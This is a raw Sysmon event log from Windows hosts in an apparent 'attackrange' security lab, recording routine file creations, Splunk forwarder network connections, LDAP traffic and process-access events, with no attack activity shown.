23542300x8000000000000000807150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:11.396{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=335578B49D2DDE4E5E14BEA8C3B8D3C8,SHA256=C09161E7081D4FF557E43F7835301DCB27CD9DDE3D184B001AB307FCE5965ED6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:11.232{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=3A9EC2524549B04312FE32017C39A125,SHA256=9AAEBAE292877A21577EE539D4E5C472215A2508C111B4CFC255539D1E4C5A70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:12.915{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAB5874458AA479B5AF4D61D27018CC,SHA256=4F1F14A73C114F623A241749A3CD03F3C5B93E67FC44AD4E814351E3422AF59E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:12.412{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A215CAFB5913E88F585E56668A4485D7,SHA256=053933FA43B7D0A16967CC348C3C60E314A61F157635B67C68D1CB75BA63AEA2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:12.395{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001047979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:12.394{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=91624699EB6D588C19203B284A0D6A52,SHA256=F2CC627064B5D0D8DEB4031479EB4A39174BBFCCBDEF6C0E4365A761F38D4D14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:13.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D5FD8A8BB18C83EB9DC2694BCD73CF,SHA256=5519A4FBC63B1A84439C9E01C355038472132275D5A6D72333148C82B440078C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:13.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74C34613E7827387AAAE68F3B6C56B85,SHA256=BB481E6F72C0DCCD891F7E320734A2904DE22BEF9647E2C5A57DF643EF8604DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:04.741{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50996-false10.0.1.12-8000- 354300x8000000000000000807152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:11.310{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57237-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:14.960{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC36CC4171005809B87450C358035FA,SHA256=07976DFC390671EF8593E569C20A43B1231551F6B709A1E24B3D9A385A10A9E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:14.435{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4036C9658468EF76F9461EFFE15DFDA9,SHA256=E21DCA895B4A77F02EA104B91FCA3021733314FF27C9D40BD4A6200FAA50A065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F848687823BDC0E4BAD3087B08D3298,SHA256=682E57EE481AC67A2A2E94C326632B62E423E9F0BE811823AFC6E97E23ECDA8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:15.450{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9AEC6D407431A86C2606D57F6DFD45F,SHA256=148F7E49E74B78EE0C0CC38875134D1C6D10CF8101CD20CFE0134C2DE0914400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.396{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A7B4F8ADF72ECEDB6D0BCD4318509E9,SHA256=6238318A3A91D0799E84E7F08899BAF2665DFD3CDD8EF0A42F65B118354B93F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:15.395{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A825D4F8EC48B891781CD4158FB931C4,SHA256=E8E8B9DBB2050CFDC3D9FDC802A21817587CF12538677840C3A128F0855EFC91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:16.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CD0ACF60C85C81B1E67ADF6440EF22,SHA256=03FDFCF32945A0902D5E0DD876F4B8A0A74F6B5FD756CBD318E95E15F7F95558,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:16.450{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DFC17434AEF518764912B5C3E13C3FB,SHA256=90514F6BB59831B646F37BFBB2170971173288CFCED271CE1ADFC2BADFAA09CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:07.923{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50997-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001047988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:07.923{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50997-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000807157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:17.466{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0586BFCF4D116260D0279E250819966,SHA256=37591BACC3F9F36253B6867C51C74D12D4CD613A4640113BB9120F28B417F156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:18.482{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=707BE530D0C3459AE4095E85891872C9,SHA256=23CE719E3EDC8D22EE258AB863BAC9AA7F4E22FBE2A4CC9086557E10BA09D0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:18.241{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=7682ED7DF69F38A3484028AA4BD7D74B,SHA256=B50787BAB66B72C291E9EB98A39508311943BFCB658A295DB04C6B997D26E1AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:18.210{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:18.010{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3A21C7336D2B9D952F4D8AB5F4CF5C,SHA256=ECD733E3B773F7FE690D7AA81800A93A82DD5AB11A25AF87DAB733959E9D0E04,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:17.224{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57238-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:19.497{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A84D6E31F225F731664A08A7EAF54F30,SHA256=B885E1301871843D2D18F749B8019747000F2DD17244A3FE78282B4BB5FD78E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:10.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50998-false10.0.1.12-8000- 23542300x80000000000000001047994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:19.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C45F2923B5DCCC747930EA0A7A904BDD,SHA256=4B2F89959AADF550A085E3253E98B85D83607831EA73BD4286404226F361FF8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:20.497{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15EB58AE9490B0079A2078A89B66C7E,SHA256=BA8A8BD379292A0A10CFE7B320D92022CE31764241B45D5B956B668F2BAFDC92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:20.041{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0ED5D159F56BA070D6E146F00F902B2,SHA256=E0165C460600A6FF715335817447A05E64CAE512FF1EED0467A7B0E417AAE4B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:20.435{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:21.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47AB0CAD6BA93705B36F6B09AEF1DFB7,SHA256=881E6322C3E08815F6BB78581F6FD9DCD40912090F4EE276349FB8FAB5D1FB76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:21.055{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0CBF1DA2B2F02FC453E7B3DE7BFF9B,SHA256=0FEBDC7225DEF0940EBCCBD8C46EC2CB55D450305C85626D6E4E7706A39E21EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:20.567{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57239-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000807164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:22.513{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8A8C0E75893D051B55758B760291492,SHA256=FC03690665E1628AC1F6C8E780C405536848F899B6E90FDB58095E733FDEAEB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:22.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65F2A390949DA4E3B7F6D21F3AB3BF12,SHA256=77CF9E55E00E052314556BF13CF5E33A5CEC1CC85FA108B16B42FC4A8AFFF51E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:23.529{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9BF3423EA009705424CFA175A557BEF,SHA256=B728B1C77C7EF4F9514E415AC4001D063E823CE695D1D38C819EA19AF4EB98FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:23.088{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2EF02C96E9CC0E004AC2840BF22B4AB,SHA256=519A15BF69DD4EA6A198B0AAE54EC945AAF4FF2D8FAF7E5F73D3C2B20EC15577,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F440-60EB-6679-00000000D001}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:24.779{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 